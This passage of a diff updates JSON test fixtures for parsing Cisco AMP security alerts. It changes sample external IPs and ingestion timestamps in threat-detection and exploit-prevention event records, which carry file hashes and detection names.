Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}", "code": "1107296279", "kind": "alert", "start": "2021-01-15T10:20:00.000Z", @@ -2370,7 +2280,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2435,7 +2345,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2452,8 +2362,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070178610Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898162800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2475,7 +2385,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2525,7 +2435,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2538,8 +2448,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070180588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898167100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2561,7 +2471,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2611,7 +2521,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2624,8 +2534,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070182611Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898171800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2647,7 +2557,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2697,7 +2607,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2714,8 +2624,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070184598Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898175800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2737,7 +2647,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2787,7 +2697,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2800,8 +2710,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070186589Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898180800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2823,7 +2733,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2873,7 +2783,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2886,8 +2796,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070188588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898186700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2909,7 +2819,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2956,7 +2866,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2966,8 +2876,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070190593Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898192700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2989,7 +2899,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3036,7 +2946,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
